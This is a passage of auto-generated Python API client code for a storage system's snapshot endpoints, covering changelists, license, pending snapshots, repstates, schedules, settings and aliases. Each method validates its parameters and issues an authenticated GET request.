_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_snapshot_changelist(self, snapshot_changelist_id, **kwargs): # noqa: E501
"""get_snapshot_changelist # noqa: E501
Retrieve basic information on a changelist. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_snapshot_changelist(snapshot_changelist_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str snapshot_changelist_id: Retrieve basic information on a changelist. (required)
:param int limit: Return no more than this many results at once (see resume).
:param str resume: Continue returning results from previous call using this token (token should come from the previous call, resume cannot be used with other options).
:return: SnapshotChangelists
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_snapshot_changelist_with_http_info(snapshot_changelist_id, **kwargs) # noqa: E501
else:
(data) = self.get_snapshot_changelist_with_http_info(snapshot_changelist_id, **kwargs) # noqa: E501
return data
def get_snapshot_changelist_with_http_info(self, snapshot_changelist_id, **kwargs): # noqa: E501
"""get_snapshot_changelist # noqa: E501
Retrieve basic information on a changelist. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_snapshot_changelist_with_http_info(snapshot_changelist_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str snapshot_changelist_id: Retrieve basic information on a changelist. (required)
:param int limit: Return no more than this many results at once (see resume).
:param str resume: Continue returning results from previous call using this token (token should come from the previous call, resume cannot be used with other options).
:return: SnapshotChangelists
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['snapshot_changelist_id', 'limit', 'resume'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_snapshot_changelist" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'snapshot_changelist_id' is set
if ('snapshot_changelist_id' not in params or
params['snapshot_changelist_id'] is None):
raise ValueError("Missing the required parameter `snapshot_changelist_id` when calling `get_snapshot_changelist`") # noqa: E501
if 'limit' in params and params['limit'] > 4294967295: # noqa: E501
raise ValueError("Invalid value for parameter `limit` when calling `get_snapshot_changelist`, must be a value less than or equal to `4294967295`") # noqa: E501
if 'limit' in params and params['limit'] < 1: # noqa: E501
raise ValueError("Invalid value for parameter `limit` when calling `get_snapshot_changelist`, must be a value greater than or equal to `1`") # noqa: E501
if ('resume' in params and
len(params['resume']) > 8192):
raise ValueError("Invalid value for parameter `resume` when calling `get_snapshot_changelist`, length must be less than or equal to `8192`") # noqa: E501
if ('resume' in params and
len(params['resume']) < 0):
raise ValueError("Invalid value for parameter `resume` when calling `get_snapshot_changelist`, length must be greater than or equal to `0`") # noqa: E501
collection_formats = {}
path_params = {}
if 'snapshot_changelist_id' in params:
path_params['SnapshotChangelistId'] = params['snapshot_changelist_id'] # noqa: E501
query_params = []
if 'limit' in params:
query_params.append(('limit', params['limit'])) # noqa: E501
if 'resume' in params:
query_params.append(('resume', params['resume'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['basicAuth'] # noqa: E501
return self.api_client.call_api(
'/platform/1/snapshot/changelists/{SnapshotChangelistId}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='SnapshotChangelists', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_snapshot_license(self, **kwargs): # noqa: E501
"""get_snapshot_license # noqa: E501
Retrieve license information. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_snapshot_license(async_req=True)
>>> result = thread.get()
:param async_req bool
:return: LicenseLicense
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_snapshot_license_with_http_info(**kwargs) # noqa: E501
else:
(data) = self.get_snapshot_license_with_http_info(**kwargs) # noqa: E501
return data
def get_snapshot_license_with_http_info(self, **kwargs): # noqa: E501
"""get_snapshot_license # noqa: E501
Retrieve license information. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_snapshot_license_with_http_info(async_req=True)
>>> result = thread.get()
:param async_req bool
:return: LicenseLicense
If the method is called asynchronously,
returns the request thread.
"""
all_params = [] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_snapshot_license" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['basicAuth'] # noqa: E501
return self.api_client.call_api(
'/platform/5/snapshot/license', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='LicenseLicense', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_snapshot_pending(self, **kwargs): # noqa: E501
"""get_snapshot_pending # noqa: E501
Return list of snapshots to be taken. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_snapshot_pending(async_req=True)
>>> result = thread.get()
:param async_req bool
:param int limit: Return no more than this many result at once (see resume).
:param int begin: Unix Epoch time to start generating matches. Default is now.
:param str schedule: Limit output only to the named schedule.
:param int end: Unix Epoch time to end generating matches. Default is forever.
:param str resume: Continue returning results from previous call using this token (token should come from the previous call, resume cannot be used with other options).
:return: SnapshotPending
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_snapshot_pending_with_http_info(**kwargs) # noqa: E501
else:
(data) = self.get_snapshot_pending_with_http_info(**kwargs) # noqa: E501
return data
def get_snapshot_pending_with_http_info(self, **kwargs): # noqa: E501
"""get_snapshot_pending # noqa: E501
Return list of snapshots to be taken. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_snapshot_pending_with_http_info(async_req=True)
>>> result = thread.get()
:param async_req bool
:param int limit: Return no more than this many result at once (see resume).
:param int begin: Unix Epoch time to start generating matches. Default is now.
:param str schedule: Limit output only to the named schedule.
:param int end: Unix Epoch time to end generating matches. Default is forever.
:param str resume: Continue returning results from previous call using this token (token should come from the previous call, resume cannot be used with other options).
:return: SnapshotPending
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['limit', 'begin', 'schedule', 'end', 'resume'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_snapshot_pending" % key
)
params[key] = val
del params['kwargs']
if ('resume' in params and
len(params['resume']) > 8192):
raise ValueError("Invalid value for parameter `resume` when calling `get_snapshot_pending`, length must be less than or equal to `8192`") # noqa: E501
if ('resume' in params and
len(params['resume']) < 0):
raise ValueError("Invalid value for parameter `resume` when calling `get_snapshot_pending`, length must be greater than or equal to `0`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
if 'limit' in params:
query_params.append(('limit', params['limit'])) # noqa: E501
if 'begin' in params:
query_params.append(('begin', params['begin'])) # noqa: E501
if 'schedule' in params:
query_params.append(('schedule', params['schedule'])) # noqa: E501
if 'end' in params:
query_params.append(('end', params['end'])) # noqa: E501
if 'resume' in params:
query_params.append(('resume', params['resume'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['basicAuth'] # noqa: E501
return self.api_client.call_api(
'/platform/1/snapshot/pending', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='SnapshotPending', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_snapshot_repstate(self, snapshot_repstate_id, **kwargs): # noqa: E501
"""get_snapshot_repstate # noqa: E501
Retrieve basic information on a repstate. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_snapshot_repstate(snapshot_repstate_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str snapshot_repstate_id: Retrieve basic information on a repstate. (required)
:param int limit: Return no more than this many results at once (see resume).
:param str resume: Continue returning results from previous call using this token (token should come from the previous call, resume cannot be used with other options).
:return: SnapshotRepstates
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_snapshot_repstate_with_http_info(snapshot_repstate_id, **kwargs) # noqa: E501
else:
(data) = self.get_snapshot_repstate_with_http_info(snapshot_repstate_id, **kwargs) # noqa: E501
return data
def get_snapshot_repstate_with_http_info(self, snapshot_repstate_id, **kwargs): # noqa: E501
"""get_snapshot_repstate # noqa: E501
Retrieve basic information on a repstate. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_snapshot_repstate_with_http_info(snapshot_repstate_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str snapshot_repstate_id: Retrieve basic information on a repstate. (required)
:param int limit: Return no more than this many results at once (see resume).
:param str resume: Continue returning results from previous call using this token (token should come from the previous call, resume cannot be used with other options).
:return: SnapshotRepstates
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['snapshot_repstate_id', 'limit', 'resume'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_snapshot_repstate" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'snapshot_repstate_id' is set
if ('snapshot_repstate_id' not in params or
params['snapshot_repstate_id'] is None):
raise ValueError("Missing the required parameter `snapshot_repstate_id` when calling `get_snapshot_repstate`") # noqa: E501
if 'limit' in params and params['limit'] > 4294967295: # noqa: E501
raise ValueError("Invalid value for parameter `limit` when calling `get_snapshot_repstate`, must be a value less than or equal to `4294967295`") # noqa: E501
if 'limit' in params and params['limit'] < 1: # noqa: E501
raise ValueError("Invalid value for parameter `limit` when calling `get_snapshot_repstate`, must be a value greater than or equal to `1`") # noqa: E501
if ('resume' in params and
len(params['resume']) > 8192):
raise ValueError("Invalid value for parameter `resume` when calling `get_snapshot_repstate`, length must be less than or equal to `8192`") # noqa: E501
if ('resume' in params and
len(params['resume']) < 0):
raise ValueError("Invalid value for parameter `resume` when calling `get_snapshot_repstate`, length must be greater than or equal to `0`") # noqa: E501
collection_formats = {}
path_params = {}
if 'snapshot_repstate_id' in params:
path_params['SnapshotRepstateId'] = params['snapshot_repstate_id'] # noqa: E501
query_params = []
if 'limit' in params:
query_params.append(('limit', params['limit'])) # noqa: E501
if 'resume' in params:
query_params.append(('resume', params['resume'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['basicAuth'] # noqa: E501
return self.api_client.call_api(
'/platform/1/snapshot/repstates/{SnapshotRepstateId}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='SnapshotRepstates', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_snapshot_schedule(self, snapshot_schedule_id, **kwargs): # noqa: E501
"""get_snapshot_schedule # noqa: E501
Retrieve the schedule. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_snapshot_schedule(snapshot_schedule_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str snapshot_schedule_id: Retrieve the schedule. (required)
:return: SnapshotSchedules
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_snapshot_schedule_with_http_info(snapshot_schedule_id, **kwargs) # noqa: E501
else:
(data) = self.get_snapshot_schedule_with_http_info(snapshot_schedule_id, **kwargs) # noqa: E501
return data
def get_snapshot_schedule_with_http_info(self, snapshot_schedule_id, **kwargs): # noqa: E501
"""get_snapshot_schedule # noqa: E501
Retrieve the schedule. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_snapshot_schedule_with_http_info(snapshot_schedule_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str snapshot_schedule_id: Retrieve the schedule. (required)
:return: SnapshotSchedules
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['snapshot_schedule_id'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_snapshot_schedule" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'snapshot_schedule_id' is set
if ('snapshot_schedule_id' not in params or
params['snapshot_schedule_id'] is None):
raise ValueError("Missing the required parameter `snapshot_schedule_id` when calling `get_snapshot_schedule`") # noqa: E501
collection_formats = {}
path_params = {}
if 'snapshot_schedule_id' in params:
path_params['SnapshotScheduleId'] = params['snapshot_schedule_id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['basicAuth'] # noqa: E501
return self.api_client.call_api(
'/platform/3/snapshot/schedules/{SnapshotScheduleId}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='SnapshotSchedules', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_snapshot_settings(self, **kwargs): # noqa: E501
"""get_snapshot_settings # noqa: E501
List all settings # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_snapshot_settings(async_req=True)
>>> result = thread.get()
:param async_req bool
:return: SnapshotSettings
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_snapshot_settings_with_http_info(**kwargs) # noqa: E501
else:
(data) = self.get_snapshot_settings_with_http_info(**kwargs) # noqa: E501
return data
def get_snapshot_settings_with_http_info(self, **kwargs): # noqa: E501
"""get_snapshot_settings # noqa: E501
List all settings # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_snapshot_settings_with_http_info(async_req=True)
>>> result = thread.get()
:param async_req bool
:return: SnapshotSettings
If the method is called asynchronously,
returns the request thread.
"""
all_params = [] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_snapshot_settings" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['basicAuth'] # noqa: E501
return self.api_client.call_api(
'/platform/1/snapshot/settings', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='SnapshotSettings', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_snapshot_snapshot(self, snapshot_snapshot_id, **kwargs): # noqa: E501
"""get_snapshot_snapshot # noqa: E501
Retrieve snapshot information. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_snapshot_snapshot(snapshot_snapshot_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str snapshot_snapshot_id: Retrieve snapshot information. (required)
:return: SnapshotSnapshots
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_snapshot_snapshot_with_http_info(snapshot_snapshot_id, **kwargs) # noqa: E501
else:
(data) = self.get_snapshot_snapshot_with_http_info(snapshot_snapshot_id, **kwargs) # noqa: E501
return data
def get_snapshot_snapshot_with_http_info(self, snapshot_snapshot_id, **kwargs): # noqa: E501
"""get_snapshot_snapshot # noqa: E501
Retrieve snapshot information. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_snapshot_snapshot_with_http_info(snapshot_snapshot_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str snapshot_snapshot_id: Retrieve snapshot information. (required)
:return: SnapshotSnapshots
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['snapshot_snapshot_id'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_snapshot_snapshot" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'snapshot_snapshot_id' is set
if ('snapshot_snapshot_id' not in params or
params['snapshot_snapshot_id'] is None):
raise ValueError("Missing the required parameter `snapshot_snapshot_id` when calling `get_snapshot_snapshot`") # noqa: E501
collection_formats = {}
path_params = {}
if 'snapshot_snapshot_id' in params:
path_params['SnapshotSnapshotId'] = params['snapshot_snapshot_id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['basicAuth'] # noqa: E501
return self.api_client.call_api(
'/platform/1/snapshot/snapshots/{SnapshotSnapshotId}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='SnapshotSnapshots', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_snapshot_snapshots_summary(self, **kwargs): # noqa: E501
"""get_snapshot_snapshots_summary # noqa: E501
Return summary information about snapshots. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_snapshot_snapshots_summary(async_req=True)
>>> result = thread.get()
:param async_req bool
:return: SnapshotSnapshotsSummary
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_snapshot_snapshots_summary_with_http_info(**kwargs) # noqa: E501
else:
(data) = self.get_snapshot_snapshots_summary_with_http_info(**kwargs) # noqa: E501
return data
def get_snapshot_snapshots_summary_with_http_info(self, **kwargs): # noqa: E501
"""get_snapshot_snapshots_summary # noqa: E501
Return summary information about snapshots. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_snapshot_snapshots_summary_with_http_info(async_req=True)
>>> result = thread.get()
:param async_req bool
:return: SnapshotSnapshotsSummary
If the method is called asynchronously,
returns the request thread.
"""
all_params = [] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_snapshot_snapshots_summary" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['basicAuth'] # noqa: E501
return self.api_client.call_api(
'/platform/1/snapshot/snapshots-summary', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='SnapshotSnapshotsSummary', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def list_snapshot_aliases(self, **kwargs): # noqa: E501
"""list_snapshot_aliases # noqa: E501
List all or matching snapshot aliases. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.list_snapshot_aliases(async_req=True)
>>> result = thread.get()
:param async_req bool
:param str sort: The field that will be used for sorting. Choices are id, name, snapshot, and created. Default is id.
:param int limit: Return no more than this many results at once (see resume).
:param str dir: The direction of the sort.
:param str resume: Continue returning results from previous call using this token (token should come from the previous call, resume cannot be used with other options).
:return: SnapshotAliasesExtended
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.list_snapshot_aliases_with_http_info(**kwargs) # noqa: E501
else:
(data) = self.list_snapshot_aliases_with_http_info(**kwargs) # noqa: E501
return data
def list_snapshot_aliases_with_http_info(self, **kwargs): # noqa: E501
"""list_snapshot_aliases # noqa: E501
List all or matching snapshot aliases. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.list_snapshot_aliases_with_http_info(async_req=True)
>>> result = thread.get()
:param async_req bool
:param str sort: The field that will be used for sorting. Choices are id, name, snapshot, and created. Default is id.
:param int limit: Return no more than this many results at once (see resume).
:param str dir: The direction of the sort.
:param str resume: Continue returning results from previous call using this token (token should come from the previous call, resume cannot be used with other options).
:return: SnapshotAliasesExtended
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['sort', 'limit', 'dir', 'resume'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method list_snapshot_aliases" % key
)
params[key] = val
del params['kwargs']
if 'limit' in params and params['limit'] > 4294967295: # noqa: E501
raise ValueError("Invalid value for parameter `limit` when calling `list_snapshot_aliases`, must be a value less than or equal to `4294967295`") # noqa: E501
if 'limit' in params and params['limit'] < 1: # noqa: E501
raise ValueError("Invalid value for parameter `limit` when calling `list_snapshot_aliases`, must be a value greater than or equal to `1`") # noqa: E501
if ('dir' in params and
len(params['dir']) < 0):
raise ValueError("Invalid value for parameter `dir` when calling `list_snapshot_aliases`, length must be greater than or equal to `0`") # noqa: E501
if ('resume' in params and
len(params['resume']) > 8192):
raise ValueError("Invalid value for parameter `resume` when calling `list_snapshot_aliases`, length must be less than or equal to `8192`") # noqa: E501
if ('resume' in params and
len(params['resume']) < 0):
raise ValueError("Invalid value for parameter `resume` when calling `list_snapshot_aliases`, length must be greater than or equal to `0`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
if 'sort' in params:
query_params.append(('sort', params['sort'])) # noqa: E501
if 'limit' in params:
query_params.append(('limit', params['limit'])) # noqa: E501
if 'dir' in params:
query_params.append(('dir', params['dir'])) # noqa: E501
if 'resume' in params:
query_params.append(('resume', params['resume'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['basicAuth'] # noqa: E501
return self.api_client.call_api(
'/platform/1/snapshot/aliases', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='SnapshotAliasesExtended', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def list_snapshot_changelists(self, **kwargs): # noqa: E501
"""list_snapshot_changelists # noqa: E501
List all changelists. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.list_snapshot_changelists(async_req=True)
>>> result = thread.get()
:param async_req bool
:param int limit: Return no more than this many results at once (see resume).
:param str resume: Continue returning results from previous call using this token (token should come from the previous call, resume cannot be used with other options).
:return: SnapshotChangelistsExtended
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.list_snapshot_changelists_with_http_info(**kwargs) # noqa: E501
else:
(data) = self.list_snapshot_changelists_with_http_info(**kwargs) # noqa: E501
return data
def list_snapshot_changelists_with_http_info(self, **kwargs): # noqa: E501
"""list_snapshot_changelists # noqa: E501
List all changelists. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.list_snapshot_changelists_with_http_info(async_req=True)
>>> result = thread.get()
:param async_req bool
:param int limit: Return no more than this many results at once (see resume).
:param str resume: Continue returning results from previous call using this token (token should come from the previous call, resume cannot be used with other options).
:return: SnapshotChangelistsExtended
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['limit', 'resume'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method list_snapshot_changelists" % key
)
params[key] = val
del params['kwargs']
if 'limit' in params and params['limit'] > 4294967295: # noqa: E501
raise ValueError("Invalid value for parameter `limit` when calling `list_snapshot_changelists`, must be a value less than or equal to `4294967295`") # noqa: E501
if 'limit' in params and params['limit'] < 1: # noqa: E501
raise ValueError("Invalid value for parameter `limit` when calling `list_snapshot_changelists`, must be a value greater than or equal to `1`") # noqa: E501
if ('resume' in params and
len(params['resume']) > 8192):
raise ValueError("Invalid value for parameter `resume` when calling `list_snapshot_changelists`, length must be less than or equal to `8192`") # noqa: E501
if ('resume' in params and
len(params['resume']) < 0):
raise ValueError("Invalid value for parameter `resume` when calling `list_snapshot_changelists`, length must be greater than or equal to `0`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
if 'limit' in params:
query_params.append(('limit', params['limit'])) # noqa: E501
if 'resume' in params:
query_params.append(('resume', params['resume'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['basicAuth'] # noqa: E501
return self.api_client.call_api(
'/platform/1/snapshot/changelists', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='SnapshotChangelistsExtended', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
